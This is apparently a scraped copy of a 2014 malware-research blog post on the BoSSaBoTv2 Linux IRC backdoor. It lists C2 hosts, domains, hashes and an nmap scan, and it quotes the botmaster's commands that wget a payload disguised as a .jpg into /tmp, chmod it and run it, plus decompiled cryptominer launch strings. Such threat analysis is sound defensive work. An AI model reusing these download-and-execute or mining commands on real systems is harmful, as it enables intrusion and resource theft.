• No results found

BoSSaBoTv2 : another Linux Backdoor IRC malekal's site

N/A
N/A
Info
Download
Protected

Academic year: 2021

Share "BoSSaBoTv2 : another Linux Backdoor IRC malekal's site"

Copied!
14
0
0

Loading.... (view fulltext now)

Download now ( 14 Page )

Full text

(1)

Projet antiMalwares Comparatif Antivirus Soutenir Malekal.com Forum

Me contacter

malekal's site site entraide informatique

Rechercher... Rechercher Articles/Papiers Projet antiMalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter Flux RSS

Global Internet Backbone

he.net/ip_transit/

IPv6+IPv4 Transit For Your Network New Special 10 Gbps $4000/month

[en] BoSSaBoTv2 : another Linux

Backdoor IRC

Par Menu Accueil News Malwares / Informatique / Internet

(2)

12 2 41 2 Share 70

Today, i was looking at my web honeypot and this one pay my attention :

http://www.malekal.com/modsec/index.php?ip=178.32.59.202

The PHP vulnerability is very used (already wrote something about it :

http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time i saw thoses base64decode code.

The code lead to haxmeup.uni.me (192.95.12.34 – OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg

I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary :

https://www.virustotal.com/fr/file

/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis /1409041374/

so i launch it :

Click this bar to view the full image.

Click this bar to view the full image.

Share Tweet Share

GNU/Linux Basique Général Réseau Windows General Malwares Sécurité Windows Tutoriaux Logiciels News du site / Vrac

Publicité ?>

Rejoignez-nous sur Facebook

(3)

made a connection to 37.59.74.161 (OVH again) port 8067, there is an ircd behind :

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST Nmap scan report for 37.59.74.161

Host is up (0.027s latency). PORT STATE SERVICE VERSION 8067/tcp open irc Unreal ircd Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Top menaces Pos. Menaces 1. PUPs MySearchDial - Trovi -istart.webssearches.com - istartsurf 2. Adware

Sweet Page - System SpeedUp - Mega

Browser - ViewPassword

- Ads by Keep now

3. Trojan

Antivirus Security Pro

-ZeroAccess / Sirefef

4.

Worm Virus USB Raccourcis

Plus de procédures de désinfection Partenaires Autoblog Malekal botnets.fr geekden Le blog de Chantal11 Liste Malwares – malekal.com PjJoint Malekal.com S!RI Blog

(4)

so an IRC Backdoor.

Click this bar to view the full image.

Another surprise, the ircd doesnt have any mod to hide users etc. ~40 bots, not so much.

So let’s play.

Click this bar to view the full image.

on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers.

We can see that the exploit at 200.185.236.85 was successfull because it joins the channel as a new bot.

Tigzy Roguekiller Xylibox Blog Publicités Mots clefs adware

adwares

Antispywares

Antivir

antivirus

Avast!

backdoor

botnet CD Live désinfection Eorezoexploit Firefox

Network Bandwidth Monitor

solarwinds.com

See Which Users, Apps & Protocols Are Consuming Bandwidth- Learn More ... Google Chromecast for $35 google.com/Chr

Enjoy online video & anything from the web on your TV. buy now!

...

(5)

confrimed by my VM.

We got an other DNS con32.cz.cc that give the same IP 192.95.12.34

Click this bar to view the full image.

Two new bots :

Click this bar to view the full image. Malwares PUP

ransomware

rogue

rogues

rootkit réseau

scareware

spam

spyware

spywares

Stealer TDSS

trojan

Trojan.Winlock

trojans

Tuto4PC

tutorial

vers

virus

Windows worms zbot ZeroAccess Publicités

(6)

The IRCd is new around ~40 bots in 9 days :

Click this bar to view the full image.

The botmaster made regularly download new binary – all from www.bilder-upload.eu (seems legitim)

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp !BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab

!BOSS* SH chmod 777 /tmp/4L2nJG5Vab !BOSS* SH /tmp/4L2nJG5Vab

Some Hashs and Hosts recap :

haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH) haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33 http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902 http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e

You need Flash player 8+ and JavaScript enabled to view this video.

Publicités

(7)

Click this bar to view the full image.

then i wrote a little script to send the email abuse, hope, they will lose some bots

Click this bar to view the full image.

MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com /files.php?read=20140826_n7h14d5w5i6

Thanks to them. Bitcoin capabilities :

000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null & 000000007C20 pkill minerd ; pkill m32 ; pkill m64

000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.

(8)

The most interresting :

000000007E1D BoSSaBoTv2-%s

a search at Google this topic on http://www.hackforums.net /showthread.php?tid=4395309

According the date post, the kit is new and the price is at 100$

Click this bar to view the full image.

(9)
(10)

Back, lot of attacks this WE : http://www.malekal.com/modsec/index.php?ip=213.73.31.13 http://www.malekal.com/modsec/index.php?ip=195.154.140.251 http://www.malekal.com/modsec/index.php?ip=5.135.64.105 http://www.malekal.com/modsec/index.php?ip=46.105.230.91 http://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected

http://malwaredb.malekal.com

/index.php?hash=5453043042be4ad21259bcb9b17e9bd3 http://malwaredb.malekal.com

/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd : 23.95.10.101 port 53

Click this bar to view the full image.

(11)

You may also like:

40

40 22

(12)

12 2 41 2 Share 70 Trojan.Chepvil et Trojan.Sasfis / Trojan.Cridex : les campagnes de Spam malicieux continuent SPAM/Virus Facebook : gagner un iphone 4S color

SpamHaus ransomware

Tutorial Dial-a-fix Supprimer Adware.Zango Supprimer

Win32/Stration.worm.Gen

/Email-Worm.Win32.Warezov.lp

Share Tweet Share

(13)

2 Comments

sneezing_panda

Posté le 8 septembre 2014 à 4:28

He’s an idiot. http://puu.sh/bqOYA/ebec4b2878.png People are already complaining on the HF thread.

1.

CyD

Posté le 8 septembre 2014 à 10:52

Using botnets of zombie computers to spread malicious code through

vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please, report this kind of cybercrime activities to federal law

enforcement. Keep up the good work. 2.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Nom * E-Mail *

myturbopc.com

Remove all Malware in 2 mins. #1 Download for 2014. Rated 5/5!

(14)

Ce site est hébergé par la société OVH Plan du site

À propos du thème Arras

Commentaire

sert à rien d'exposer vos problèmes ici, allez sur le forum pour obtenir de l'aide : http://forum.malekal.com

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Laisser un commentaire

References

Download now ( PDF - 14 Page - 8.03 MB )

Related documents

Enhancing the Students Writing Ability by Using Comic Strips

The criteria consists of two aspects, namely; first, the data obtained from the students‟ writing narrative include content, organization, vocabulary, language use

Teacher and Staff Perspectives on the Needs of High School Students who are At Risk of Academic Failure and Truancy

Programming for students at risk of school dropout should include afterschool programs, intervention programs, remedial academic and social skills groups, family environment,

Being a Young Learner English Language Teacher in a Polish Primary School- Professional Self- Construction In a Climate Of a Reform

The thesis reports on English primary school teachers’ experience of educa- tional change in lower grades of Polish primary schools. It means that teachers have

Estimating Highway Subsidence due to Longwall Mining

The subsidence factor obtained with this model was 0.83, and the vertical stress distribution and trough shape are given in Figure 5-28 and Figure 5-29, respectively.. Figure

ICT LITERACY AMONG LIBRARY PROFESSIONALS IN THE ENGINEERING COLLEGE LIBRARIES OF TAMIL NADU: AN ANALYTICAL STUDY

The library professionals must possess sufficient knowledge of new ICT skills such as library automation, e-resources management, content management, organization of

Iphone Trust Certificate

Broken link is iphone certificate email account without written permission from your certificate from their own ca trust seal for android device need to gmail on the unlocked my

Influencers in Multiplayer Online Shooters Evidence of Social Contagion in Playtime and Social Play

Our ind- ings show that inluencers do indeed impact other players and more so than power users or the average player, thus providing evidence for a social contagion efect and the

NOBLESVILLE HIGH SCHOOL SCHOOL IMPROVEMENT PLAN

Noblesville High School offers educational programs leading to Core 40 with Academic Honors, Core 40 with Technical Honors, Core 40, and basic diplomas.. Description and Location